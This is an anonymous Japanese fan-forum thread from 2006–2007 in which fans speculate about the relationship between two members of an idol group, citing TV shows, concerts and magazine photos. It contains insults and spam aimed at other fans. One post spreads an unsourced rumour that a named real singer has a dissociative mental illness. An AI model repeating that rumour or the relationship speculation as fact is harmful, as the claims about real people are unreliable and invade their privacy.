266 :ななしじゃにー:2006/11/15(水) 21:35:44 ID:pn2m7ucv
>264
それを聞いてどこにコピペするつもりなんだ?

267 :ななしじゃにー:2006/11/16(木) 00:16:23 ID:3l2YRYF9
>266
そうピリピリすんな。

268 :ななしじゃにー:2006/11/16(木) 01:32:59 ID:u0U/PlQ1
そういや他のでも円陣で隣りの時あったような。
長く映ってるのじゃなくて瞬殺だったやつ…
歌藁の歪っつかツヤコ密着の時だっけ?

269 :ななしじゃにー:2006/11/17(金) 09:03:37 ID:Zm5ECJVs
動物園でのし●ちゃん撮影シーンで虹だった件。


270 :ななしじゃにー:2006/11/17(金) 23:49:09 ID:1IrLpBcc
なになに?

271 :ななしじゃにー:2006/11/21(火) 07:49:13 ID:SJlCbJMl
IDキタコレww
記念カキコ

272 :ななしじゃにー:2006/11/21(火) 21:04:04 ID:DCGWLmBw
おい、明日の粗人
虹らしいぞ

273 :ななしじゃにー:2006/11/22(水) 03:22:46 ID:tcJiydWU
やっと過去レス全部読み終わたあるよ。
お初です。虹信者の方々に大きな拍手そして敬礼。
皆さんの意見に激しく同意っす。
事実に基づいていればいいんだ米。
どこにいってもこのネタないんだけど大丈夫かな。
ばにぃら紀文で傘が単独で出演の時にしていたマ●アと十●架の
ペ●ダントとまぎょまぎょあらぴのSPで歪がしていたペ●ダント
お揃いです。貸し借りをしたのかどちらかがあげたのか
それとも2人で買い揃えたのか、謎(妄想)は膨らむばかりでつ。
以前まぎょまぎょで小僧とひらが出張の回のEDトークで
お土産にソーセージの試食があったの覚えてまつか。
あの時の傘の色気は今でも鮮明に覚えてるっす。
歪に美味しい?と聞かれた時の傘のうんと言ったときの
表情ときたら、まぁきゃわいらしいこときゃわいらいしいこと。
あの恍惚の傘は一生忘れまへん。
歪の10月アリジョナひっとり旅も臭う。
某誌での傘の血歯に住んでる友達に会いに行ったら豪雨だったけど●ンビニと●ルフに行った
発言とどうしても結び付けてしまう自分はかなり重度の虹担と認識。
とにかくDVDやTVでの歪と傘のやり取りで思わずリピってしまう部分が全て皆さんと一致。
特にまぎょは大量に発掘できまつ。
OPトーク中、猫目のセリフを読みながら横切る傘を無理矢理傘君こっち(馬子)きなよ
と傘の肩と腕を掴み自らの所有物かのように自分の元へ引き寄せる歪。
そのあとの小僧の俺あっち行くわの気の使いようったら2人ご勝手にという感じ。
妄想が止まらないっす。
眠い・・・落ちます。







274 :ななしじゃにー:2006/11/22(水) 05:08:05 ID:Njh/blk3
なんかすごいのが来たな('A`)

275 :ななしじゃにー:2006/11/22(水) 06:20:15 ID:YZpSsG7/
粗人が禿ヤバス。
傘の頑なな拒絶と歪の強引な懇願。
虹の最終形態ktkr!

276 :ななしじゃにー:2006/11/22(水) 08:12:22 ID:RXoDQvI2
恐いもの見たさで読んでしまったじゃねーか。

>275
久々の構図だなw

277 :ななしじゃにー:2006/11/22(水) 09:11:53 ID:Tx/O5AtD
ツリーとベルのクオリティが同等ダナ。
カ●゙エエよ、虹。

278 :ななしじゃにー:2006/11/22(水) 10:04:15 ID:p1+8K9nq
相変わらずの弟オーラ全開だな、歪w

傘、手料理ぐらい作ってやれYO!

279 :ななしじゃにー:2006/11/22(水) 13:55:16 ID:Q/9H6r3u
>273
歪のアリゾナは目撃によると歪一人だったから違うとオモー
空港とアリゾナのすし屋

280 :ななしじゃにー:2006/11/22(水) 15:09:39 ID:c0S++p0E
粗宿でお絵かき神経衰弱を、傘と歪の絵で是非!
全く現物が判らないだろうなw

281 :ななしじゃにー:2006/11/22(水) 15:42:12 ID:1lI/uGe2
歪と傘、お揃いネックレスは確情?

282 :ななしじゃにー:2006/11/22(水) 16:45:58 ID:uQz6ze1z
情事のもつれ

283 :ななしじゃにー:2006/11/22(水) 17:29:25 ID:+bOip6Sr
粗人見て本気で仲悪いかマジでデキてるかのどっちかだと思えてきた。
傘、歪にだけにぶっきらぼうで冷たすぎるよ。

284 :ななしじゃにー:2006/11/22(水) 21:44:16 ID:bsjFllw+
記念パピコ!!
ネ申雑誌ありがトン!!

285 :ななしじゃにー:2006/11/22(水) 22:52:01 ID:tcJiydWU
先ほどは長文カキコでスマソ。
>281
傘が古林サチコとT●Mと一緒に出てた回に付けてた物と
孫のジジババ●鯨団in遊園地(クルックルッ回すひらMC)で歪が付けていた物は
確実に絶対に同じネックレスでつよ。見比べてみてケロ。
>275
そんなに凄いのか今回の粗人!速攻で買いに走るっす。
>279
そうなんですね。情報ありがとデス。妄想が暴走し杉ますた(反省)。





286 :ななしじゃにー:2006/11/22(水) 23:27:02 ID:K2GZHh+b
とりあえずsageてくれ。
話はそれからだ

287 :ななしじゃにー:2006/11/22(水) 23:27:19 ID:P/4RKfD1
>273,>285
age厨な上にもしない上にレスアンもつけれない全角深山、挙げ句のでつ厨
二度とクンナ('A`)

288 :ななしじゃにー:2006/11/22(水) 23:28:37 ID:P/4RKfD1
スマソ日本語オカシクナッタorz

289 :ななしじゃにー:2006/11/22(水) 23:40:53 ID:VXDINxrb
ワロスw sageとかそういうレベルじゃねーよw

290 :ななしじゃにー:2006/11/22(水) 23:48:36 ID:QVYrwdvb
自動翻訳の文章かとオモタ

291 :ななしじゃにー:2006/11/23(木) 00:03:18 ID:MXRGh03H
>285
ageんな!!

スタイリストが一緒だから、アクセを使いまわすことがある。
孫もスタイリストは野村さん。

292 :ななしじゃにー:2006/11/23(木) 00:05:10 ID:JCHXwztB
長文よりもsageていないことを謝罪しろ!
このあほんだら!

293 :ななしじゃにー:2006/11/23(木) 03:30:22 ID:IYURVjIM
>>285
きんもー☆
逝けよ


294 :ななしじゃにー:2006/11/23(木) 08:13:23 ID:wchkUnsl
>285
これからもツンデレ兄弟傘歪見たかったら
行き過ぎた妄想やめてくれ。

295 :ななしじゃにー:2006/11/23(木) 10:44:46 ID:W1Foagyb
傘、歪にだけ無愛想杉…
マジで何かやましいことでもあるのか?

296 :ななしじゃにー:2006/11/23(木) 14:41:26 ID:Le5NvPeM
あるんじゃね?w
前に歪から映画誘ったときも頑なにキョヒってたキガスw
ま、いずれにせよ虹企画だと何故か2人とも幼くなってモヘ

297 :ななしじゃにー:2006/11/23(木) 21:20:47 ID:o89Bmqr2
自分はあのコメ読んで傘が頑なに拒否ってるだとか
無愛想だとか全く思わなかったな。
むしろ近年稀に見る歪とのモヘ話ktkr!とニヤついたw

298 :ななしじゃにー:2006/11/23(木) 21:50:11 ID:IYURVjIM
二二二二二二l      | ̄ ̄ ̄ ̄ ̄|   引っ越し!引っ越し!!
 | | ♪同人板にいけ〜!|        |    さっさと引っ越〜し!!
 | |  ♪ _________ ♪   |      ∧_∧     しばくぞッッ!!!!
 | |    |◎□◎|.   |     (*`・3・´)つ─◎
 | | /´ ̄ ̄ ̄ ̄/⌒ヽ.|   /´ ̄し' ̄し' \ ///.
 ̄ ̄|       | | ̄ ̄ ̄|  、_人_ /  彡 ◎ ̄ ̄ ̄ ̄ ̄
    |       | |      |  _)  ◎彡.| |   バン
    |       | |     |  ´ `∀´   .| |  バン
    t______t,,ノ     t_______t,ノ


299 :ななしじゃにー:2006/11/23(木) 22:29:19 ID:JCHXwztB
おまえがいけや

300 :ななしじゃにー:2006/11/24(金) 00:52:20 ID:CJsMwcSj
衣装やアクセは本当に使い回し多いからあんま参考にスンナ。
以前、雑誌で歪が付けていたロザリオと同じものを別の雑誌でひらが付けていたし、
雑誌で歪が着ていた衣装を番組で小僧が着ていたこともある。
今年だと、少蔵で歪が付けてたコサージュを会見で小僧が付けてたり、
小僧とひらが別の雑誌で同じ時計を付けていたり様々。
常に身に着けているもの以外は、スタイリストの用意したものだと思っとけ。

301 :ななしじゃにー:2006/11/24(金) 02:25:19 ID:hJJtbGZA
さっき

302 :ななしじゃにー:2006/11/24(金) 04:27:52 ID:svB4HkU2
同人傘厨の妄想きめえええ。
まじ迷惑なんだよ氏ねw

303 :ななしじゃにー:2006/11/24(金) 04:31:41 ID:svB4HkU2
二二二二二二l      | ̄ ̄ ̄ ̄ ̄|   引っ越し!引っ越し!!
 | | ♪同人板にいけ〜!|        |    さっさと引っ越〜し!!
 | |  ♪ _________ ♪   |      ∧_∧     しばくぞッッ!!!!
 | |    |◎□◎|.   |     .ノノ`∀´ルつ─◎
 | | /´ ̄ ̄ ̄ ̄/⌒ヽ.|   /´ ̄し' ̄し' \ ///.
 ̄ ̄|       | | ̄ ̄ ̄|  、_人_ /  彡 ◎ ̄ ̄ ̄ ̄ ̄
    |       | |      |  _)  ◎彡.| |   バン
    |       | |     |  ´ `・3・´   .| |  バン
    t______t,,ノ     t_______t,ノ

304 :ななしじゃにー:2006/11/24(金) 10:02:26 ID:UD/QPfUI
>300
そんくらい知ってるだろ。
キモい基地害を相手にしてるのは、おまいくらいだ。

束、長文で他麺の名前出してまで、否定しなくてもいいよ。

305 :ななしじゃにー:2006/11/24(金) 10:16:46 ID:6MpZrVnF
>>300
とりあえずIDオメ。

306 :ななしじゃにー:2006/11/24(金) 13:43:23 ID:hxhwsVhs
>>303
歪、傘が痛がっとるから止めてやれ。

307 :ななしじゃにー:2006/11/24(金) 14:57:39 ID:fXiaaXGe
591 :ななしじゃにー:2006/11/24(金) 04:42:07 ID:svB4HkU2
同人傘豚厨ってしょっちゅうこんな事ばっかり考えてるの?
きんもーっ☆
しかも都合悪くなるといつも小僧担と歪担のせいにするよねw





ID:svB4HkU2 乙。

308 :ななしじゃにー:2006/11/24(金) 23:43:50 ID:u9W9hWdb
>307
それがどこだか気になっちゃって探してたけど
どこだよw

309 :ななしじゃにー:2006/11/25(土) 09:02:48 ID:RIqrvFCb
ガイドの歪末っ子甘モードにモヘ。
こんな企画を作ってくれたガイドにモヘ。
傘は昔から歪のまじめな所褒めてあげてたな。
変わらないなw

>308
傘全スレ探せばある。 

310 :ななしじゃにー:2006/11/25(土) 19:01:17 ID:cfzPY+uG
>>309
キニナル!!コンビスレ全部覗いたけどないよーっ

てか、虹で晩御飯はくんのかな

311 :ななしじゃにー:2006/11/26(日) 17:00:22 ID:O1IpKhLn
虹の晩御飯見たいけど、子供が可哀想w

312 :ななしじゃにー:2006/11/26(日) 17:32:48 ID:vERGhQ0Q
【言いたくないけど】猫目で801【ばいばい】
http://sakura03.bbspink.com/test/read.cgi/801/1162738942/

313 :ななしじゃにー:2006/12/02(土) 23:48:31 ID:APZ3gcHc
虹はもはや以前とはかけ離れた関係。末っ子が大人になり過ぎた。

314 :ななしじゃにー:2006/12/03(日) 00:00:16 ID:LIAkNGTs
末っ子が大人になりすぎようと、傘が運動音痴だろうと、虹は虹。

315 :ななしじゃにー:2006/12/04(月) 22:29:48 ID:rQFkkKgu
豚局のフ●パ攻略法とかを歪に教えてやってくれ、傘。

316 :ななしじゃにー:2006/12/05(火) 13:59:46 ID:ssxCNPxO
そうか?歪は大人ぶろうとしてるけどやっぱり根底には弟気質があって
傘はそれを見抜いててさりげなくフォローしてあげてる気がする
そっけないけど兄弟みたいな関係に萌える

317 :ななしじゃにー:2006/12/05(火) 14:38:35 ID:wthSvuly
歪がキャラ変えした頃から
二人の間にビミョーな距離感。たまに垣間見る歪の弟気質をサラッと流す傘。
歪をどういじっていいのかわからない傘。

318 :ななしじゃにー:2006/12/05(火) 15:14:20 ID:SXMYzIYy
君はもともとーまつーもとー

319 :ななしじゃにー:2006/12/06(水) 17:32:23 ID:l5M4v2ab
そうか?
傘のあの歪に対する反応は不思議だと思うがw
なぜか歪に話しかけられてる時、不自然に目合わせないようにすること多かったり
かと思えば、今でも歪を陰からフォローしてたり。

320 :ななしじゃにー:2006/12/06(水) 23:17:56 ID:6O+f3Ysm
T●Fありがとうt●f

321 :ななしじゃにー:2006/12/06(水) 23:23:03 ID:tMhHIQfK
虹ノリノリで禿モエスwww

322 :ななしじゃにー:2006/12/06(水) 23:26:23 ID:JKlNuKtj
釈迦より勿論先にTRFリピったw

323 :ななしじゃにー:2006/12/06(水) 23:34:00 ID:TocmSB4j
T●Fはネ申w

324 :ななしじゃにー:2006/12/06(水) 23:52:01 ID:zCaMx9IY
t●fの時の虹2ショ録り損ねたorz
ウォーウォーウォーウォーの度に歪の方をチラ見してからウォーウォーウォーウォーする傘モヘ!

325 :ななしじゃにー:2006/12/07(木) 00:21:59 ID:ju19/MZT
>>324
歪はT●Fに夢中だったがなw
でも萌え

326 :ななしじゃにー:2006/12/07(木) 00:30:51 ID:I/7WafDJ
あらち音のT●Fネタ思い出したw 選曲科委員会ナツカシスw

327 :ななしじゃにー:2006/12/07(木) 01:07:14 ID:fyXt5300
円卓の座り順が最初左から傘ひら歪でチッと
思っていたが気が付いたらひら傘歪になってたね。
ナイス席替え。

328 :ななしじゃにー:2006/12/07(木) 08:33:45 ID:JuixZDCP
なんでチッとおもいますか??
それはあなたの心の乱れですよ

329 :ななしじゃにー:2006/12/07(木) 09:40:57 ID:N964UHDo
>319
歪に見つめられると思わず目をそらしてしまう・・・
これヲタでもそうだということに気づいたよ。
でも良く見ると傘だけじゃなく他メンもそんな感じじゃね?
そんな目力が歪にはあると納得した。

330 :ななしじゃにー:2006/12/07(木) 17:28:23 ID:dY3L8D20
昨日火曜祭のt〇fの時歪を気にし過ぎてる傘ちゃんが禿か〇いかった

331 :ななしじゃにー:2006/12/09(土) 02:16:14 ID:eyQ1mh3D
誹謗中傷の嵐。
だから本人達が気にして何もできないんじゃないの。
暖かく見守ったらどうですか。
同人に逝ってくれ。


332 :ななしじゃにー:2006/12/09(土) 10:50:57 ID:EC1AYZT1
歪最近やけに…プヨってないか?

333 :ななしじゃにー:2006/12/09(土) 23:49:05 ID:RwMNNQJS
ageながら正論吐かれたって・・・

334 :ななしじゃにー:2006/12/09(土) 23:52:58 ID:ShjDK1Cb
あれを正論って…

335 :ななしじゃにー:2006/12/10(日) 23:41:35 ID:a2c4QEuZ
いや、スマソカッタ。
昨日疲れて帰ってきて見たら、正論に見えたんだよ。

>だから本人達が気にして何もできないんじゃないの。

とか。「あー、そうかもー。虹の2ショ見れないのは自業自得かも」なんて
チョト反省したりしたんだけど、今見ると>331もおかしいよなあ。
いつものアフォ安置なんだろうけど。

336 :ななしじゃにー:2006/12/11(月) 01:02:35 ID:qRlV8ECP
>>335
晩御飯虹ロケ希望、まで読んだ。

337 :ななしじゃにー:2006/12/11(月) 01:39:45 ID:rtcflJjn
虹ロケは嬉しいが
晩御飯だと子供がカワイソス…w

無難に粗宿のロケがイイ

338 :ななしじゃにー:2006/12/11(月) 08:22:45 ID:Reg3K2CR
隣板の斗の日記に歪の名前あり・・・
傘に連絡してないところが坪とオモタのはジヌンだけ?

339 :ななしじゃにー:2006/12/11(月) 08:36:27 ID:LB8t7BBA
>338
モチのロンで坪ったw

340 :ななしじゃにー:2006/12/11(月) 16:42:52 ID:rur49r15
傘君のスケは概に把握してたからかけられなかったんだよ。

341 :ななしじゃにー:2006/12/11(月) 18:18:38 ID:CrA5oPXt
妄想は禁止ですワヨ

342 :ななしじゃにー:2006/12/11(月) 21:52:42 ID:sMlC0Em0
ナツラルに山ロケだと思ってたよ、自分。

343 :ななしじゃにー:2006/12/12(火) 00:39:53 ID:Cja5Iu8R
週末の夜に傘がつかまるわけないジャマイカ


344 :ななしじゃにー:2006/12/12(火) 00:50:47 ID:0ukEX5Gh
    ナンデヤネンッ !
   \      /
      Oノ
      ノ\_・’ヽO.
       └ _ノ ヽ
           〉

345 :ななしじゃにー:2006/12/12(火) 01:20:05 ID:ZHGj2OW8
なんでageんの?

346 :ななしじゃにー:2006/12/12(火) 15:44:40 ID:4Ksr7IzL
今更だが、芋誌の傘「歪のロケの回は見てる」発言にホコーリ。

347 :ななしじゃにー:2006/12/12(火) 18:41:44 ID:ny0Ifof+
>>346
ジヌンは見てないが歪の何のロケ?

348 :ななしじゃにー:2006/12/12(火) 19:48:45 ID:v4IMwOD9
学校へ行こうのロケ

349 :ななしじゃにー:2006/12/12(火) 22:00:09 ID:4Ksr7IzL
>>347
ロケって言う位だからマゴだと思う。
テキストでそれぞれの麺とのロケの感想を述べてるんだけど、
その中で傘が歪のロケO.Aは見てる、と語ってるんだよ。

350 :ななしじゃにー:2006/12/12(火) 23:10:14 ID:KXQ6lkaN
ホッコリ‥!

351 :ななしじゃにー:2006/12/12(火) 23:32:54 ID:lUmGmS6T
携帯の周波数について傘くんが教えてくれた
と嬉しそうに報告する歪がカ●゙エエ。

352 :ななしじゃにー:2006/12/13(水) 00:27:57 ID:Feh0DCvG
虹の会話ってシュールだなw

353 :ななしじゃにー:2006/12/13(水) 01:56:01 ID:CLD6EgTV
( ゚д゚ ) ・・・・


       ( ゚д゚ ) ・・・・


               ( ゚д゚ ) ・・・





354 :ななしじゃにー:2006/12/13(水) 20:44:33 ID:D2Pc6GMv
クンプー一緒に観覧中と聞いてきますた、誰か虹レポ頼む

355 :ななしじゃにー:2006/12/13(水) 21:04:01 ID:q2nXlHqq
虹でクンプー観劇だって。
今日行ってる姐さんいたらレポ超ヨロ!

356 :ななしじゃにー:2006/12/13(水) 21:37:18 ID:Ie4m0dbz
今日入ったよ。
傘ktkrと思ったら後ろに歪もついてきててビクーリした。
虹はもちろんお隣さんだったが、話したりしていたかどうかは不明。
でも舞台中二人の名前を2回程呼ばれてて、それだけで嬉しくなった自分w

357 :ななしじゃにー:2006/12/13(水) 21:55:49 ID:D2Pc6GMv
まりがとん!今頃3人で食事か脳

358 :ななしじゃにー:2006/12/13(水) 22:06:57 ID:+hqehgAI
☆も居たらしいyo。三名様仲良く御観覧。

359 :ななしじゃにー:2006/12/13(水) 22:07:34 ID:qTiaXxLX
歪2回目?
昨日も行ったって聞いたんだけど。

360 :ななしじゃにー:2006/12/13(水) 22:08:34 ID:JEJztQtj
意外な組み合わせだな。

361 :ななしじゃにー:2006/12/13(水) 23:09:23 ID:UrJS+Ca8
去年も平安かひら舞台を
傘歪小僧の3人で観にいってるから珍しい組み合わせでもないだろ。

それにしても、☆はあらち担だなw

362 :ななしじゃにー:2006/12/14(木) 00:43:26 ID:RlHsxDJ2
>359
昨日きてないよ。
今日が初だったはず。
☆と傘が喋ってるのはみたけど
虹喋りはなかったとオモー

363 :ななしじゃにー:2006/12/14(木) 00:47:12 ID:RlHsxDJ2
スマソ。マジで。

転世されにいってくる

364 :ななしじゃにー:2006/12/14(木) 00:49:43 ID:RlHsxDJ2
…テンパリスギデス。

サスケになりに逝ってクル

365 :ななしじゃにー:2006/12/15(金) 19:44:27 ID:1KIovfzE
もまいは氷室になって逝け

366 :ななしじゃにー:2006/12/18(月) 09:43:42 ID:XgzP6A7n
北側同人@マターリ談義パート2
http://comic6.2ch.net/test/read.cgi/doujin/1166091782/

367 :ななしじゃにー:2006/12/23(土) 00:09:32 ID:ePj7Xedy
タモステの最後、虹だったよな?
一瞬しか写らなかったけど…。
最近また虹ひっつきもっつきしてんのか?

368 :ななしじゃにー:2006/12/23(土) 08:31:10 ID:Wi7GyDEv
隣にいるだけで騒ぐな!
キモ杉

369 :ななしじゃにー:2006/12/23(土) 11:13:57 ID:nBIK9eON
隣にいるだけでも貴重なんです

370 :ななしじゃにー:2006/12/23(土) 15:08:48 ID:+nmdqoE4
昨日、金沢で虹を見たよ。

371 :ななしじゃにー:2006/12/23(土) 15:27:24 ID:LiTC/p6Z
タモステは最後みんないたぞ
それより今日の孫だろ!歪が傘にツッコミw

372 :ななしじゃにー:2006/12/23(土) 15:27:37 ID:3NLSxt8M
>370
kwsk

373 :ななしじゃにー:2006/12/23(土) 15:41:11 ID:5zRTuV67
>>372
普通に不可能

374 :ななしじゃにー:2006/12/24(日) 01:52:50 ID:HfoseCbH
>>371
kwsk

375 :ななしじゃにー:2006/12/24(日) 03:49:01 ID:77/Wcrhr
始めの5人トークで孫と晩御飯のチームを決めることになったとき
傘「俺の料理の腕を見せてあげたい」
歪「だってできないじゃん」
傘「それがまたできないのよ!」
隣同士ウマー


376 :ななしじゃにー:2006/12/31(日) 02:24:41 ID:ueiuXHP0
櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも
櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも
櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも
櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも

377 :ななしじゃにー:2006/12/31(日) 12:48:23 ID:ueiuXHP0
櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも
櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも
櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも
櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも
櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも
櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも
櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも
櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも櫻井ヲタきも

378 :ななしじゃにー:2006/12/31(日) 21:06:50 ID:V9E18y1V
>376
ここのおすすめ2ちゃんねる見てみれば?
し●べだらけじゃん。

379 :ななしじゃにー:2007/01/01(月) 12:28:34 ID:yN1eo6t2
牛紺の時、トロッコ一緒になっても全く絡まない虹モヘ(*´д`)

380 : 【大吉】 【895円】 :2007/01/01(月) 15:46:43 ID:RU3lqyMe
>379
ノシ

蛇波の挨拶で虹が幸先とイッテるのにもモヘタw

381 : 【だん吉】 【1250円】 :2007/01/01(月) 18:53:21 ID:4bU9sByL
虹はツンデレだけどカ●゙エエな。
今年も虹がたくさん見られるといいの

382 :ななしじゃにー:2007/01/02(火) 01:29:58 ID:N5r8Theo
地元紙にカンコック紺の写真が載っていたのだが、
その中の5人で固まって歌っている1枚がモヘモヘ。

383 :ななしじゃにー:2007/01/02(火) 05:48:07 ID:UrKw8+aG
牛紺に行ったジヌンですが、映らなかったみたいなので…
現場ではかなり話してましたよ。トロッコ去るときもずーと会話してました。

384 :ななしじゃにー:2007/01/02(火) 10:06:47 ID:U4wnl/+L
>>383d!
何故そこを映してくれないのか…


映す訳ないかorz

385 :ななしじゃにー:2007/01/02(火) 15:36:56 ID:79PLPQRz
>382
地元同じかも。
虹ががっつり見つめ合ってるやつだよな?

386 :ななしじゃにー:2007/01/02(火) 16:32:21 ID:ebtSpXm+
>383
さすが虹クオリティww

387 :ななしじゃにー:2007/01/02(火) 19:45:34 ID:7PStvtF6
>382>385
地元オシエレ今すぐオシエレ

388 :ななしじゃにー:2007/01/02(火) 20:15:36 ID:+LEeIlAg
>387
自分はお茶の国新聞で見た。
衝撃映像ダタ。

389 :ななしじゃにー:2007/01/02(火) 20:24:59 ID:Ims7NsFI
そういえばTVで写真集の中身紹介がちらっと流れたとき、
相変わらず他麺ジャージのなかふたりだけ黒ローブで写ってる楽屋ショットがあった。
誘う紺から3年以上経ってもまだおそろだったのでびっくりしたw
見つめ合いも写真集に収録されてることを切に希望。

390 :ななしじゃにー:2007/01/02(火) 22:24:21 ID:79PLPQRz
>387
382だが、もみまんの国だよ
どこの写真も同じみたいだな。

391 :ななしじゃにー:2007/01/02(火) 22:30:04 ID:7PStvtF6
>388>390
産休。コピー頼んでみる。

392 :ななしじゃにー:2007/01/02(火) 23:47:11 ID:2vQx33Bd
亀すぎてスマソ、382は笹団子だよ。
かきこんですぐ寝てしまったんで・・・すごい衝撃ダタ。
教えてくれたパパソありがとん。

393 :ななしじゃにー:2007/01/03(水) 00:48:19 ID:T7aSZ6LV
うわぁスマソ!390は385ですた。

394 :ななしじゃにー:2007/01/03(水) 16:14:23 ID:L8dXLMII
なんか、長瀬が濱崎のことを構ってるのは
女王様の山のように高いプライドと病気のせい。
解離性のなんか抱えてるらしいから。精神的に。
だからLAまで迎えにいったんだよ。
「いまさら誰のことも信じられない」って長瀬を呼んだの。
マネージャーも付き人もメイクも衣装も全部。
どんどん女王様が切っていって、兄しかいなくなって。
そのお兄さんからのSOSを受けて長瀬が迎えにいった、と。

―たったそれだけのことだよ



395 :ななしじゃにー:2007/01/04(木) 17:32:15 ID:MhHbOZlj
一部最後の挨拶手繋ぎキタコレ。傘くん呼びも。

396 :ななしじゃにー:2007/01/04(木) 20:52:35 ID:EwAFhFlh
◆◆◆ネタバレ注意◆◆◆



ラトルチンタの初っ端、虹二人だけで歌い踊る。
虹の彼方を思い出したよ(´Д`)
しかし上手の端と下手の端でめっさ遠い…

397 :ななしじゃにー:2007/01/04(木) 21:50:09 ID:jQSdCm2d
何気に愛甘に萌えたんだが。

398 :ななしじゃにー:2007/01/04(木) 22:10:35 ID:iz8e0RCG
>397
ノシ
虹パートあったね。
しかも「ちょ、虹ktkr!」ってオモテたらその後の歌詞に
「虹」とあって吹いたw
でもそこはもう全員で歌ってたかな。

399 :ななしじゃにー:2007/01/05(金) 00:09:18 ID:9n4AqvMP
4日二恥部MC
洗濯どうやってするかみたいな話の時いの一番に
「傘くん絶対しなさそー」ktkr

400 :ななしじゃにー:2007/01/05(金) 01:15:01 ID:nAAvYOh0
二部も手繋ぎキタ(恒例か?)
傘は平安の手は自分から握ったが歪からは握られるの待ってた

401 :ななしじゃにー:2007/01/05(金) 01:40:56 ID:4DPmeCvk
このスレ下がり過ぎ……_| ̄|○

.\○/age
  |
 | ̄ ̄|


402 :ななしじゃにー:2007/01/06(土) 20:04:16 ID:dUvdC+f6
北国のヤシは本日の北○道新聞夕刊をチェキ

写真がネ申

403 :ななしじゃにー:2007/01/07(日) 00:37:37 ID:c/qjz1Pm
教えろ!

404 :ななしじゃにー:2007/01/07(日) 05:24:16 ID:BN18FIir
いや、ガイシュツの記事と同じだよ。

405 :ななしじゃにー:2007/01/08(月) 00:09:30 ID:rRzPdZtP
視線を交わしてるアレか?
教えてくれて、d。
ふー、何度見てもモエ。

406 :ななしじゃにー:2007/01/11(木) 02:04:48 ID:SSExK9db
歪が撮ったポラに傘だけいないと思ったら平安の後ろにいたのに気付いた…
直では恥ずかしかったのかw

407 :ななしじゃにー:2007/01/13(土) 17:24:32 ID:7OhKxtaO
零に歪様単独ktkr

408 :ななしじゃにー:2007/01/13(土) 18:58:02 ID:QXnm/mnV
>407
しかも、月曜とはナイスタイミングだな。

409 :ななしじゃにー:2007/01/13(土) 19:03:13 ID:dOdeQJiY
小僧の映画も傘が行ったんだから、今回も傘レポでお願いしたい

410 :ななしじゃにー:2007/01/15(月) 17:19:17 ID:yGOW85e/
結局傘レポなのかな?wktk

411 :ななしじゃにー:2007/01/15(月) 21:55:44 ID:GtTZzXD9
今から正座で待っている
頼むよニッテレ

412 :ななしじゃにー:2007/01/16(火) 00:33:50 ID:5iKtCm0u
昨日観たっつってたが、
まさかまた5人揃ってじゃないよなw

413 :ななしじゃにー:2007/01/16(火) 08:54:09 ID:Udc3rjoS
傘レポじゃナカタのは残念だがあれはあれでモエス

414 :ななしじゃにー:2007/01/16(火) 12:02:28 ID:Nsfvs/zw
>413
コメント求められた時は傘も少し戸惑ってたがなw

415 :ななしじゃにー:2007/01/16(火) 12:42:31 ID:1lVIojKK
今やっと気付いたけど、緒具さんになったら
毎週右と左に虹を侍らせられるんだな。
ウラヤマスィ。


416 :ななしじゃにー:2007/01/16(火) 12:46:41 ID:l4EUSa6B
傘の話題になってちょっと嬉しそうな顔になってた歪、見逃さなかったぞw
そして、顔アップ来てコメにキョドる傘。
相変わらず不自然な虹テラモエス(*´Д`)


417 :ななしじゃにー:2007/01/16(火) 19:31:48 ID:Nsfvs/zw
>412
予想的中オメ

418 :ななしじゃにー:2007/01/16(火) 20:31:41 ID:Fq/zfdCA
友人にこの二人仲悪いの?と聞かれた
これが普通とこたえておいた

419 :ななしじゃにー:2007/01/16(火) 22:31:30 ID:B45Y/iMB
仲良く無いのに映画観ないだろ…って…釣られた

420 :ななしじゃにー:2007/01/16(火) 22:49:06 ID:9D1+llNi
写真集でカンコックの普段着のショット、虹色違いのブレス着けてないか?
傘が橙で歪が黒いやつ

421 :ななしじゃにー:2007/01/16(火) 23:17:48 ID:r20Vwn3k
同じ指に指輪もしてる
スタイリストは虹贔屓か  GJ

422 :ななしじゃにー:2007/01/17(水) 03:22:52 ID:yIhlctPc
よくみんな気付くな…スゲーでもジヌンの虹萌エショットはやっぱりカンコックリハの歪が傘に何か言ってるショットだな

423 :ななしじゃにー:2007/01/17(水) 09:19:29 ID:SDPuTi4f
皆ほんとにスゲーなw 自分は生でもみたが、やはり感動した
台湾二日目の手繋ぎw 歪笑いすぎw

424 :ななしじゃにー:2007/01/17(水) 23:19:00 ID:ogJVItbv
某誌、p3の教室の写真、虹見つめあって笑ってるように見えてモエス

425 :ななしじゃにー:2007/01/17(水) 23:54:32 ID:FN2dOHt9
>424
対談も何気にモエス(*´Д`)

426 :ななしじゃにー:2007/01/18(木) 00:33:06 ID:DrEsycXQ
+@ct

427 :ななしじゃにー:2007/01/18(木) 20:37:41 ID:C3l4l3is
なるとも、傘の名前だけ出さない歪
ツンデレだな本当に

428 :ななしじゃにー:2007/01/18(木) 22:39:06 ID:QMSvgo/j
いたいたそんなツンデレ兄弟w
消防や厨房の時って外で兄貴の話するの嫌がる男子いるw
ほんとは仲良しのくせに



と思っとく。淋しいから。
あらちはみんな仲良しじゃないと嫌だ!

429 :ななしじゃにー:2007/01/19(金) 00:01:54 ID:1ssMSbfC
